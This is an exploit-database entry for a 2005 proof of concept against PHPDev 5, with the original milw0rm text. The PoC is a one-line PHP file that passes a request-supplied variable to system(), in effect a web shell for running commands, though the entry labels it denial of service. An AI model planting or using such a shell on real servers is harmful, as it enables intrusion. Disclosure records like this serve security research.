header-logo
Suggest Exploit
vendor:
PHPDev 5
by:
Ali7
N/A
CVSS
N/A
Local Denial-of-Service
CWE
Product Name: PHPDev 5
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

PHPDev5 <== Apache Server Local Denial-of-Service PoC

This exploit targets PHPDev 5, a PHP/Apache/MySQL server. The PoC sample code uses the system function to execute a command specified in the $Ali7 variable.

Mitigation:

Unknown
Source

Exploit-DB raw data:

------------------------------------------------------------------------
# PHPDev5 <== Apache Server Local Denial-of-Service PoC
# By : Ali7
# e-mail : ali7@hotmail.co.uk
# date : 16-03-2k5
# greetz : our group :P
 

>Target : PHPDev 5
>URL : www.firepages.com.au - http://sourceforge.net/projects/phpdev5/
>Type : PHP/Apache/MySQL Server..
..
 
>>PoC Sample :
 
Save this code as .php or .php3 file..
 
//start
 
<?

system($Ali7);

?>
 
//end

# milw0rm.com [2005-03-17]